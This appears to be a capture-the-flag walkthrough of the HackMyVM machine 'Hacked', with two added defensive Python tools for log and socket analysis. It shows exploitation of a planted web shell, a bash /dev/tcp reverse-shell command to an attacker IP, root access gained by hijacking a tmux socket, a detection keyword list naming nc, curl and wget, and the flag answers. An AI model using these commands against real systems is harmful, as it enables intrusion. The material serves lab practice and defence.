HackMyVM | Hacked

In this walkthrough, I demonstrate how I obtained complete ownership of Hacked from HackMyVM.
In: HackMyVM, Attack, CTF, Home Lab, Linux, Hard Challenge
ℹ️ I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access.

Nmap Results

# Nmap 7.95 scan initiated Tue Dec  2 14:41:51 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.19
Nmap scan report for 10.9.9.19
Host is up (0.00059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:75:44:05:5f:f8:4f:ac:a1:33:fa:84:03:db:6f:94 (RSA)
|   256 5a:b6:c6:9d:a9:15:42:74:4c:7a:f9:dd:67:ae:75:0e (ECDSA)
|_  256 05:97:3c:74:bd:cf:8d:80:87:05:26:64:7f:d9:3d:c3 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec  2 14:42:04 2025 -- 1 IP address (1 host up) scanned in 12.66 seconds
echo -e '10.9.9.19\t\thacked.hmv' | sudo tee -a /etc/hosts

Add "hacked.hmv" host entry for convenience





Service Enumeration

TCP/80

Penetration Testing

Initial Enumeration

ℹ️ Since this is a direct CTF challenge and less of a simulated web application, I'll just skip straight to the penetration testing phase (as opposed to the preliminary walking of the application).
No extra goodies in the page source
"robots.txt" entry...
Looks like a potential list of steps "h4x0r" took, so maybe there's a web shell installed already



Directory and File Enumeration

gobuster dir -u http://hacked.hmv -x php,txt --db -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -o dir.txt

Tried some other word lists too, but couldn't find anything substantial

find /usr/share/seclists | grep -i shell
Seems like a good candidate
gobuster dir -u http://hacked.hmv -w /usr/share/seclists/Web-Shells/backdoor_list.txt -t 100 -o dir.txt
Looks like it's time for some parameter fuzzing



Parameter Fuzzing

gobuster fuzz -u 'http://hacked.hmv/simple-backdoor.php?FUZZ=whoami' -t 100 \
-w '/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt' \
-o fuzz.txt
We need to filter out the response size of 62
gobuster fuzz -u 'http://hacked.hmv/simple-backdoor.php?FUZZ=whoami' -t 100 \
-w '/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt' \
-o fuzz.txt --exclude-length 62
So, the parameter name is secret
curl 'http://hacked.hmv/simple-backdoor.php?secret=whoami'
Perfect...
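From the defender's side, the fuzzing run above leaves a distinctive trace in the nginx access log: one client hitting one script with hundreds of distinct parameter names (every miss answered with the same 62-byte body), then a request whose query value is a command. The following is an added example, not code from the original post or from any tool mentioned in it, that flags both patterns over constructed sample lines in nginx's default combined log format.

```python
"""Flag parameter-name fuzzing and command-like query values in nginx access logs.
Added example (not from the original post); assumes nginx's default "combined" format."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Basenames of utilities that rarely start a legitimate query value
SHELL_BINARIES = {"whoami", "id", "uname", "cat", "ls", "bash", "sh", "nc",
                  "curl", "wget", "python", "python3", "perl"}
# Constructed sample (not captured from the target): a gobuster parameter-name sweep,
# every miss answered with the same 62-byte body, then the hit with a larger body.
SAMPLE_LOG = """\
10.6.6.6 - - [02/Dec/2025:14:50:01 +0000] "GET /simple-backdoor.php?id=whoami HTTP/1.1" 200 62 "-" "gobuster/3.6"
10.6.6.6 - - [02/Dec/2025:14:50:01 +0000] "GET /simple-backdoor.php?user=whoami HTTP/1.1" 200 62 "-" "gobuster/3.6"
10.6.6.6 - - [02/Dec/2025:14:50:01 +0000] "GET /simple-backdoor.php?cmd=whoami HTTP/1.1" 200 62 "-" "gobuster/3.6"
10.6.6.6 - - [02/Dec/2025:14:50:02 +0000] "GET /simple-backdoor.php?secret=whoami HTTP/1.1" 200 71 "-" "curl/8.5.0"
10.9.9.50 - - [02/Dec/2025:14:51:10 +0000] "GET /index.html?page=2 HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

def looks_like_command(value):
    """True when the first word of a decoded query value is a known shell utility."""
    words = value.strip().split()
    return bool(words) and words[0].rsplit("/", 1)[-1] in SHELL_BINARIES

def parse_line(line):
    """(client ip, request path, decoded query pairs), or None for a non-matching line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    return m["ip"], url.path, parse_qsl(url.query, keep_blank_values=True)

def analyze(log_text, fuzz_threshold=3):
    """Return (fuzzing, suspicious): fuzzing = [(ip, path, n)] for clients that used more
    than fuzz_threshold distinct parameter names against one path; suspicious =
    [(ip, path, param, value)] for query values that start like a shell command."""
    names = defaultdict(set)   # (ip, path) -> distinct parameter names seen
    suspicious = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        for name, value in params:
            names[(ip, path)].add(name)
            if looks_like_command(value):
                suspicious.append((ip, path, name, value))
    fuzzing = [(ip, path, len(s)) for (ip, path), s in sorted(names.items()) if len(s) > fuzz_threshold]
    return fuzzing, suspicious
```

The threshold is deliberately low for the five constructed lines; against a real log, a wordlist the size of burp-parameter-names.txt produces thousands of distinct names from one client in seconds, which no browser-driven application traffic does.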





Exploit

Reusing the Backdoor

sudo rlwrap nc -lnvp 443

Start a TCP socket to catch the reverse shell

curl -G 'http://hacked.hmv/simple-backdoor.php' --data-urlencode 'secret=/bin/bash -c '"'"'/bin/bash -i >& /dev/tcp/10.6.6.6/443 0>&1'"'"''
  • -G tells curl to append the --data-urlencode data to the URL as a GET query string instead of sending it as a POST body
  • --data-urlencode URL-encodes the value for us automatically
  • '"'"' is needed to nest single quotes within single quotes
    • Double-quotes would cause bash to interpret the & in the -c command
Success!





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux hacked 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux 

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: sudo: command not found   



Users and Groups

Local Users

h4x0r:x:1000:1000:h4x0r,,,:/home/h4x0r:/bin/bash   

Local Groups

cdrom:x:24:h4x0r
floppy:x:25:h4x0r
audio:x:29:h4x0r
dip:x:30:h4x0r
video:x:44:h4x0r
plugdev:x:46:h4x0r
netdev:x:109:h4x0r
h4x0r:x:1000:



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:f7:ad:31 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.19/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 6083sec preferred_lft 6083sec
    inet6 fe80::be24:11ff:fef7:ad31/64 scope link 
       valid_lft forever preferred_lft forever 



Interesting Files

/tmp/.hacked

find / -writable -exec ls -l {} \; 2>/dev/null | grep -vE '/proc|/sys'    
...
...
...
srwxrwxrwx 1 root root 0 Dec  2 14:41 /tmp/.hacked
file /tmp/.hacked
/tmp/.hacked: socket





Privilege Escalation

Becoming Root

Finding Parent Process of Unix Socket

The /tmp/.hacked Unix socket is interesting, because it is owned by root and sits in a world-writable directory like /tmp. But, try as I might, I cannot see the owning process using ps aux or pspy. I'd like to find which parent process created this Unix socket, so I have a better idea what I'm dealing with, as I suspect it is the process associated with the "Root shell created." step from secretnote.txt.

for pid in $(seq 1 1000); do [ -r "/proc/$pid/cmdline" ] && echo "Command line of /proc/$pid" && tr '\0' ' ' < "/proc/$pid/cmdline" && echo && echo ; done

One-liner to brute-force procfs (PIDs 1 through 1000) and print the cmdline of every process whose /proc entry is readable

Interesting! Looks like the Unix socket on /tmp/.hacked is a detached tmux session
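An administrator investigating a root-owned socket in /tmp has a more precise option than reading every cmdline: look the socket path up in /proc/net/unix to get its inode, then find which /proc/<pid>/fd/* link points at socket:[that inode]. The following is an added example (not from the original post) that does exactly that with procfs only, no lsof, ss or fuser; it assumes the Linux procfs layout, the SAMPLE_PROC_NET_UNIX text is constructed, and reading another user's fd table needs root or ptrace access to that process, which is also why the low-privileged cmdline sweep above only sees what it does.

```python
"""Map a Unix socket path to the PIDs holding it, using procfs only (no lsof/ss/fuser).
Added example, not from the original post. Assumes Linux procfs: the socket's inode
comes from /proc/net/unix and each /proc/<pid>/fd/* link reads "socket:[<inode>]"."""
import os

# Constructed /proc/net/unix sample (not captured from the target host).
SAMPLE_PROC_NET_UNIX = """\
Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000002 00000000 00010000 0001 01 12345 /run/systemd/journal/stdout
0000000000000000: 00000002 00000000 00010000 0001 01 23456 /tmp/.hacked
0000000000000000: 00000003 00000000 00000000 0001 03 23457
"""

def socket_inode(proc_net_unix, path):
    """Inode of the Unix socket bound to `path`, or None if nothing is bound there."""
    for line in proc_net_unix.splitlines()[1:]:        # skip the header row
        fields = line.split()
        if len(fields) >= 8 and fields[7] == path:     # unnamed sockets have no Path column
            return int(fields[6])
    return None

def read_fd_targets(proc_root="/proc"):
    """readlink() of every /proc/<pid>/fd/* we may read; unreadable processes are skipped."""
    out = {}
    for entry in os.listdir(proc_root):
        if entry.isdigit():
            fd_dir = os.path.join(proc_root, entry, "fd")
            try:
                out[int(entry)] = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
            except OSError:      # EACCES for other users' processes, or the process exited
                pass
    return out

def owners_of_inode(inode, fd_targets):
    """Sorted PIDs whose fd table contains socket:[inode]."""
    wanted = f"socket:[{inode}]"
    return sorted(pid for pid, links in fd_targets.items() if wanted in links)

def cmdline(pid, proc_root="/proc"):
    with open(os.path.join(proc_root, str(pid), "cmdline"), "rb") as fh:
        return fh.read().replace(b"\0", b" ").decode(errors="replace").strip()

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/tmp/.hacked"
    with open("/proc/net/unix") as fh:
        inode = socket_inode(fh.read(), target)
    if inode is None:
        sys.exit(f"{target}: no bound Unix socket listed in /proc/net/unix")
    for pid in owners_of_inode(inode, read_fd_targets()):
        print(pid, cmdline(pid))
```

Run as root on the host, this prints the tmux server PID and its command line for /tmp/.hacked; the same lookup is a reasonable periodic check for any root-owned socket that appears under a world-writable directory.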



Attach to Tmux Session

tmux -S /tmp/.hacked attach



Flags

User

HMVimthabesthacker

Root

HMVhackingthehacker 